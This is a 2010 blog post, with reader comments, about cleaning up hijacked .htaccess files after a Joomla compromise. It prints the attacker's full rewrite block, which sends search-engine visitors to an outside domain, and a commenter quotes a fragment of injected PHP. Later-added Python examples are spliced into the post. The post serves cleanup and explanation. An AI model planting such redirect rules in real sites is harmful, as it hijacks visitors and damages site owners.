Tuesday, September 21, 2010

htaccess file hacked (hijacked) - How to cleanup

Issues
I had multiple websites working properly before I went to sleep. The next morning, all of them suddenly returned "500 - Internal Server Error" and became unavailable. After investigating, I found that the .htaccess files of all my websites had been modified by a hacker. The hacker seems to redirect visitors arriving from search engines to some other destination. According to the report from my ISP, the hacker got in via Joomla. If you are using Joomla, I suggest upgrading it to the latest version.

Example of hijacked .htaccess file



# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\:).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]

...

RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WOW64|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://iamprotectedfrom.net/cgi-bin/r.cgi?p=10003&i=e0550346&j=308&m=1de1da928819b3ad82f33326bb185c45&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo
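To see who the injected rules actually hit, here is an added Python model of the condition chain above (my own example, not code from the original post); it keeps only a few of the referer and user-agent tokens, treats each RewriteCond as a boolean test, and runs it against a handful of constructed visitors:

```python
import re
from dataclasses import dataclass

# Reduced model of the RewriteCond chain in the hijacked block above (constructed; only a
# few of the page's referer and user-agent tokens are kept, which is an assumption).
SEARCH_REFERER = re.compile(
    r"^(http://)?([^/?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|/search\?).*$", re.I)
CACHE_REFERER = re.compile(r"q=cache:", re.I)        # cached-copy views are left alone
EXCLUDED_AGENTS = re.compile(r"apache|Archive|WordPress|Yahoo|Yandex|Yeti", re.I)
COOKIE_NAME = "xccgtswgokoe"                          # set by the CO= flag for 10080 minutes (7 days)

@dataclass
class Request:
    method: str = "GET"
    referer: str = ""
    user_agent: str = "Mozilla/5.0 (Windows; Firefox/3.6)"
    cookie: str = ""
    https: bool = False

def would_redirect(req):
    """True only when every RewriteCond matches, i.e. the RewriteRule fires."""
    return (req.method == "GET"
            and SEARCH_REFERER.match(req.referer) is not None
            and not CACHE_REFERER.search(req.referer)
            and not EXCLUDED_AGENTS.search(req.user_agent)
            and COOKIE_NAME not in req.cookie
            and not req.https)

# Constructed sample visitors, named by who they represent.
SAMPLES = {
    "site owner typing the URL directly": Request(),
    "visitor clicking a Google result": Request(referer="http://www.google.com/search?q=example"),
    "YandexBot arriving from Yandex": Request(referer="http://yandex.ru/yandsearch?text=x",
                                               user_agent="Mozilla/5.0 (compatible; YandexBot/3.0)"),
    "same visitor again, cookie now set": Request(referer="http://www.google.com/search?q=example",
                                                 cookie="xccgtswgokoe=1"),
    "visitor opening Google's cached copy": Request(referer="http://www.google.com/search?q=cache:example.com"),
    "visitor from Bing over HTTPS": Request(referer="http://www.bing.com/search?q=example", https=True),
}

def classify(samples=SAMPLES):
    """Map each sample visitor to whether the hijacked rule would redirect them."""
    return {name: would_redirect(req) for name, req in samples.items()}

if __name__ == "__main__":
    for name, hit in classify().items():
        print(f"{'REDIRECTED' if hit else 'untouched':10}  {name}")
```

Only the visitor arriving from a search result is redirected; the owner visiting directly, the crawler, the cached-copy view, the HTTPS visit and a repeat visitor already carrying the cookie all get the normal page, which is why this kind of hijack can go unnoticed by the site owner.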



What you can see
1. If you already have a .htaccess file, the lines above are appended to it. If you don't have one, a new .htaccess file is created.
2. This happened in all folders and sub-folders.


In order to get my sites working properly again, I had to restore all existing .htaccess files and remove the unnecessary .htaccess files from all folders, including image folders and script folders.

Here are the problems I faced:
1. There are too many folders and sub-folders; it is almost impossible to do it manually.
2. You can only access your server via HTTP or FTP; no server-side command line is available.

I contacted my ISP (internet service provider) and was told that it is not their responsibility. Then I searched the internet but didn't find any useful information on how to clean up, so I decided to clean up by myself. I created a PHP script to remove all hijacked .htaccess files.

STEPS to clean up
1. Back up the original content of your .htaccess files to other files, if you have any.
2. Run the script below to remove all .htaccess files from all folders recursively.
3. Create a new .htaccess file and copy/paste the content back from your backup file, if applicable.


RemoveHTACCESS.php

<?php

// Recursively walk $dir and delete every .htaccess file found.
function searchDir($dir) {
    $dhandle = opendir($dir);
    if (!$dhandle) {
        echo "Cannot open directory: {$dir} <br />";
        return;
    }
    // loop through the directory entries
    while (false !== ($fname = readdir($dhandle))) {
        $path = "{$dir}/{$fname}";
        if (is_dir($path)) {
            // if the entry is a directory other than '.' or '..',
            // call searchDir recursively on it
            if (($fname != '.') && ($fname != '..')) {
                echo "<u>Searching Files in the Directory</u>: {$path} <br />";
                searchDir($path);
            }
        } elseif ($fname == ".htaccess") {
            // the entry is a .htaccess file: delete it
            echo "File: {$path} <br />";
            unlink($path);
        }
    }
    closedir($dhandle);
}

searchDir(".");

?>
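As an added alternative to the script above (my own Python example, not the post's script), this version strips only the marker-delimited block from each .htaccess, keeps a .hijacked.bak copy, and deletes the file only when nothing else remains, so legitimate directives survive; it assumes the injected block is always wrapped in a comment pair with the same random token, as in the example above, and it can be run against a local copy of the site downloaded over FTP (it only reports until dry_run is set to False):

```python
import os
import re
import shutil
import tempfile
from pathlib import Path
# Marker pair like "# exgocgkctswo" wraps the block; the token varies, so match its shape (assumption).
MARKER = re.compile(r"^#\s*([a-z0-9]{8,})\s*$")

def strip_injected_block(text):
    """Drop the first marker-delimited block that contains a RewriteRule; return (text, removed)."""
    lines = text.splitlines(keepends=True)
    marks = [(i, m.group(1)) for i, l in enumerate(lines) if (m := MARKER.match(l.strip()))]
    for k, (i, tok) in enumerate(marks):
        for j, tok2 in marks[k + 1:]:
            if tok2 == tok and "RewriteRule" in "".join(lines[i + 1:j]):
                return "".join(lines[:i] + lines[j + 1:]), True
    return text, False

def clean_tree(root, dry_run=True):
    """Walk root; strip the block from every .htaccess (keeping a .hijacked.bak copy) and
    delete the file only when nothing legitimate remains. Returns (path, action, text) tuples."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = Path(dirpath) / ".htaccess"
            cleaned, removed = strip_injected_block(path.read_text(encoding="utf-8", errors="replace"))
            action = "clean" if not removed else ("restored" if cleaned.strip() else "deleted")
            if removed and not dry_run:
                shutil.copy2(path, f"{path}.hijacked.bak")  # keep the evidence before touching it
                if action == "restored":
                    path.write_text(cleaned, encoding="utf-8")
                else:
                    path.unlink()
            results.append((str(path), action, cleaned))
    return results

# Constructed sample: one legitimate directive plus an injected block with a placeholder URL.
INJECTED = ("# exgocgkctswo\nRewriteEngine On\nRewriteCond %{HTTPS} ^off$\n"
            "RewriteRule ^(.*)$ http://attacker.invalid/r.cgi [R=302,L]\n# exgocgkctswo\n")
LEGIT = "DirectoryIndex index.php\n"

def demo():
    root = tempfile.mkdtemp()  # throwaway tree: root/.htaccess (mixed) and root/images/.htaccess (injected only)
    Path(root, "images").mkdir()
    for rel, content in ((".htaccess", LEGIT + INJECTED), ("images/.htaccess", INJECTED)):
        Path(root, rel).write_text(content)
    summary = {os.path.relpath(p, root).replace(os.sep, "/"): (a, c)
               for p, a, c in clean_tree(root, dry_run=False)}
    shutil.rmtree(root)
    return summary
```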


Note:
The script above will remove all .htaccess files in the folder and all its sub-folders. Please do it very carefully. You can try it on an unimportant folder first. Even though I have tested it many times and have also used it a few times to do the cleanup, please use it at your own risk.

8 comments:

Suze said...

Thanks for your post, it has been very useful to fix my websites that have been hacked for the third time, and the ISP does not give any solution.
Any advice on avoiding another hack?

Alvin said...

I'm glad to hear that it's useful.

To prevent hackers, please change your FTP and site admin passwords frequently, especially when you have detected an attack.

If you have copied .htaccess files to your local PC, there is a high possibility that they are also affected; I suggest you check and remove them.

Anonymous said...

How did the .htaccess file get into every folder beneath the webroot (and sometimes above it as well)?
FTP has not been enabled at all.

Alvin said...

The hacker created the .htaccess file and placed it in every folder of the site to redirect your visitors to another site.

Even if FTP has been disabled, it may have come in from another source, like your control panel file manager.

It could also be any other source.

Anonymous said...

You need to look through your PHP files. I encountered this same issue a few weeks back. I did a search and found it was a Joomla issue. I wasn't running, nor have I ever run, Joomla. Check your PHP code for code like this:

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;

$olderrxxx=error_reporting(0);

function outputxxx_callback($str)

Take out everything from
After that you should see your code. This took me several days to clean up, and I am still finding pieces here and there.

Bhargava said...

worked like a charm

thanks !! :)

Anonymous said...

This works.

Many thanks, friend!

Anonymous said...

Cool script! Thanks, saved loads of hassle!